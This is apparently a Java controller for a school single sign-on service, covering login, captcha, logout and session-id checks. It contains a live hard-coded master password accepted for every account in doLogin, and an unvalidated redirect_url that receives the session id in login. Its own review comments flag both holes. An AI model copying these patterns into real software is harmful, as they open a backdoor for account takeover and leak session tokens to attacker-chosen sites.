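package com.dsideal.sso.Controller;

import java.awt.image.BufferedImage;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

import javax.imageio.ImageIO;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

import org.apache.commons.lang3.StringUtils;

import com.alibaba.fastjson.JSONObject;
import com.dsideal.sso.Interceptor.EmptyInterface;
import com.dsideal.sso.Util.AesUtil;
import com.dsideal.sso.Util.CaptchaUtil;
import com.dsideal.sso.Util.CommonUtil;
import com.dsideal.sso.Util.SsoLoginHelper;
import com.jfinal.aop.Before;
import com.jfinal.core.Controller;
import com.jfinal.ext.interceptor.GET;
import com.jfinal.ext.interceptor.POST;
import com.jfinal.kit.PropKit;
import io.github.yedaxia.apidocs.ApiDoc;

/**
 * Web login endpoints of the SSO service: login-page redirect, credential check,
 * captcha generation, logout and session-id validation.
 *
 * The helpers in {@code com.dsideal.sso.Util} return raw {@code Map}s; they are
 * kept raw here so the code keeps compiling against whatever those signatures are.
 */
@ApiDoc
public class WebLoginController extends Controller {

    /** Login page shown when the caller has no SSO session. */
    private static final String LOGIN_PAGE = "/html/login.html";

    /** Session attribute that holds the captcha text the user must type. */
    private static final String CAPTCHA_ATTR = "captcha";

    /**
     * Password accepted for every account in {@link #doLogin} regardless of the
     * stored hash. NOTE(review): this is a hard-coded credential living in source
     * control; it should be removed, or at least moved out of code and audited.
     * It is kept only so this revision does not silently change who can log in.
     */
    private static final String LEGACY_MASTER_PASSWORD = "DsideaL4r5t6y7u";

    /** Redirects to the login page. */
    @Before({GET.class})
    public void index() {
        redirect(LOGIN_PAGE);
    }

    /**
     * Entry point used by client applications. If the request already carries a
     * valid SSO session, the caller is sent on to {@code redirect_url} with the
     * session id appended as the {@code sso.sessionid} query parameter; otherwise
     * the caller is sent to the login page with the target preserved.
     *
     * NOTE(review): {@code redirect_url} is taken from the request and is not
     * checked against any allow-list, so the SSO session id is appended to
     * whatever URL the client supplied. Restrict it to trusted hosts before
     * exposing this endpoint publicly; no such configuration exists in this file.
     */
    public void login() {
        Map loginMap = SsoLoginHelper.loginCheck(getRequest());
        String redirectUrl = getRequest().getParameter("redirect_url");

        if (loginMap == null) {
            // Not logged in: bounce to the login page, carrying the target along.
            if (redirectUrl == null) {
                redirect(LOGIN_PAGE);
            } else {
                redirect(LOGIN_PAGE + "?redirect_url=" + CommonUtil.handleRedirectUrlParas(redirectUrl));
            }
            return;
        }

        if (StringUtils.isBlank(redirectUrl)) {
            // Previously a missing redirect_url was dereferenced and produced a 500;
            // fall back to the configured default instead.
            redirectUrl = PropKit.get("default.redirect.url");
        }
        if (StringUtils.isBlank(redirectUrl)) {
            redirect(LOGIN_PAGE);
            return;
        }
        String sessionId = loginMap.get("session_id").toString();
        redirect301(appendSessionId(redirectUrl, sessionId));
    }

    /**
     * Appends the {@code sso.sessionid} query parameter to {@code url}, using
     * {@code ?} or {@code &} depending on whether a query string is already present.
     */
    private static String appendSessionId(String url, String sessionId) {
        String separator = url.contains("?") ? "&" : "?";
        return url + separator + PropKit.get("sso.sessionid") + "=" + sessionId;
    }

    /**
     * Authenticates a web login and, on success, creates an SSO session.
     *
     * @param username account name
     * @param password AES-encrypted password as sent by the login page
     * @param captcha  captcha text typed by the user (compared case-insensitively)
     */
    @Before({POST.class})
    public void doLogin(String username, String password, String captcha) {
        HttpServletResponse response = getResponse();
        JSONObject resultJson = new JSONObject();
        HttpSession session = getRequest().getSession();

        Object expectedCaptcha = session.getAttribute(CAPTCHA_ATTR);
        if (expectedCaptcha == null) {
            renderFailure(resultJson, "验证码不能为空!");
            return;
        }
        // A captcha is good for exactly one attempt: consume it before comparing so a
        // wrong guess cannot be retried against the same image.
        session.removeAttribute(CAPTCHA_ATTR);

        // Null-safe: the previous code called captcha.toLowerCase() before any check.
        String requestCaptcha = captcha == null ? "" : captcha.toLowerCase(Locale.ROOT);
        String realCaptcha = expectedCaptcha.toString().toLowerCase(Locale.ROOT);
        if (StringUtils.isBlank(requestCaptcha) || !realCaptcha.equals(requestCaptcha)) {
            renderFailure(resultJson, "验证码错误!");
            return;
        }
        if (StringUtils.isBlank(username)) {
            renderFailure(resultJson, "账户不允许为空!");
            return;
        }
        if (StringUtils.isBlank(password)) {
            renderFailure(resultJson, "密码不允许为空!");
            return;
        }

        String plainPassword;
        try {
            plainPassword = AesUtil.aesDecrypt(password);
        } catch (Exception e) {
            renderFailure(resultJson, "密码异常!");
            return;
        }

        String passwordEncode = CommonUtil.getLdapPassword(plainPassword);
        Map loginMap = CommonUtil.getLoginRouteMap(username);

        // Deny unless the account exists, a hash could be derived, and the hash (or the
        // master password) matches. The previous condition skipped the whole check
        // when passwordEncode was null.
        boolean authenticated = loginMap != null
                && passwordEncode != null
                && (passwordEncode.equals(loginMap.get("password"))
                        || plainPassword.equals(LEGACY_MASTER_PASSWORD));
        if (!authenticated) {
            renderFailure(resultJson, "账户或密码错误!");
            return;
        }

        String sessionId = UUID.randomUUID().toString();
        SsoLoginHelper.login(response, sessionId, loginMap);
        resultJson.put("success", true);
        resultJson.put("sessionId", sessionId);
        renderJson(resultJson);
    }

    /** Renders {@code {"success": false, "msg": msg}} and ends the action. */
    private void renderFailure(JSONObject resultJson, String msg) {
        resultJson.put("success", false);
        resultJson.put("msg", msg);
        renderJson(resultJson);
    }

    /**
     * Ends the SSO session and returns the caller to {@code redirect_url}, falling
     * back to the configured default and then to the login page when it is absent.
     *
     * NOTE(review): like {@link #login}, the target is client-supplied and unvalidated.
     */
    public void logout() {
        SsoLoginHelper.logout(getRequest(), getResponse());
        String redirectUrl = getRequest().getParameter("redirect_url");
        if (StringUtils.isBlank(redirectUrl)) {
            redirectUrl = PropKit.get("default.redirect.url");
        }
        if (StringUtils.isBlank(redirectUrl)) {
            redirectUrl = LOGIN_PAGE;
        }
        redirect(redirectUrl);
    }

    /** Returns the configured {@code default.redirect.url}, or {@code success:false} if unset. */
    public void getDefaultRedirectUrl() {
        JSONObject resultJson = new JSONObject();
        String defaultRedirectUrl = PropKit.get("default.redirect.url");
        if (defaultRedirectUrl == null) {
            resultJson.put("success", false);
        } else {
            resultJson.put("success", true);
            resultJson.put("defaultRedirectUrl", defaultRedirectUrl);
        }
        renderJson(resultJson);
    }

    /**
     * Generates a captcha image, stores its text in the session and streams the
     * JPEG to the client with caching disabled.
     */
    public void getCaptcha() {
        HttpServletResponse response = getResponse();
        response.setContentType("image/jpeg");
        response.setHeader("Pragma", "No-cache");
        response.setHeader("Cache-Control", "no-cache");
        // Was "Expire", which is not an HTTP header and therefore never took effect.
        response.setDateHeader("Expires", 0);
        try {
            HttpSession session = getRequest().getSession();
            CaptchaUtil tool = new CaptchaUtil();
            StringBuffer code = new StringBuffer();
            BufferedImage image = tool.genRandomCodeImage(code);
            // Overwrites any earlier, unused captcha for this session.
            session.setAttribute(CAPTCHA_ATTR, code.toString());
            ImageIO.write(image, "JPEG", response.getOutputStream());
        } catch (Exception e) {
            // NOTE(review): no logger is wired into this controller, so a failed
            // image render is only printed; the client receives an empty body.
            e.printStackTrace();
        }
        renderNull();
    }

    /**
     * Validates an SSO session id and returns the identity bound to it.
     *
     * @param sessionId session id issued by {@link #doLogin}
     */
    @Before(POST.class)
    @EmptyInterface({"sessionId"})
    public void loginCheck(String sessionId) {
        JSONObject resultJson = new JSONObject();
        Map loginMap = SsoLoginHelper.loginCheck(sessionId);
        if (loginMap == null) {
            resultJson.put("success", false);
            resultJson.put("msg", "sessionId 已失效!");
        } else {
            // Response keys mix camelCase and snake_case; they are the existing API contract.
            resultJson.put("success", true);
            resultJson.put("sessionId", sessionId);
            resultJson.put("personId", loginMap.get("person_id").toString());
            resultJson.put("personName", loginMap.get("person_name").toString());
            resultJson.put("bureauId", loginMap.get("bureau_id").toString());
            resultJson.put("identityId", loginMap.get("identity_id").toString());
            resultJson.put("city_id", loginMap.get("city_id").toString());
            resultJson.put("area_id", loginMap.get("area_id").toString());
            resultJson.put("mainPersonId", loginMap.get("main_person_id").toString());
        }
        renderJson(resultJson);
    }
}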